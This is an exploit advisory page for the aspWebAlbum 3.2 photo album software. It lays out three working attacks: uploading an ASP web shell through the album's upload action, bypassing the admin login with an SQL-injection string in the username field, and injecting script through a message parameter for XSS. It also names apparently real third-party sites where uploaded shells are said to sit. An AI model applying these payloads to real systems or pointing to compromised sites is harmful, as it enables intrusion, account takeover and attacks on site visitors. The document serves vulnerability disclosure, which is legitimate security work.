aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities

2009-08-19 / 2009-08-20
Credit: null
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-6977 | CVE-2008-6978
CWE: CWE-79
CWE-Other

http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! # and your shell adress: # # http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp # # # ex:1 # http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp # # ex:2 # http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ # Ablaze rally 9-24-06/pics/klasvayv.asp # # 2-Admin Bypass [AspWebAlbum 3.2] # # http://site.com/path/album.asp?action=login # # ASP/MS SQL Server login syntax # # Username:'or' # Password:anything # # # 3-Xss Vulnerability [AspWebAlbum 3.2] # # # http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #

References:

http://xforce.iss.net/xforce/xfdb/44876
http://www.securityfocus.com/bid/30996
http://www.milw0rm.com/exploits/6420
http://www.milw0rm.com/exploits/6357
http://secunia.com/advisories/31649
http://osvdb.org/47913


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top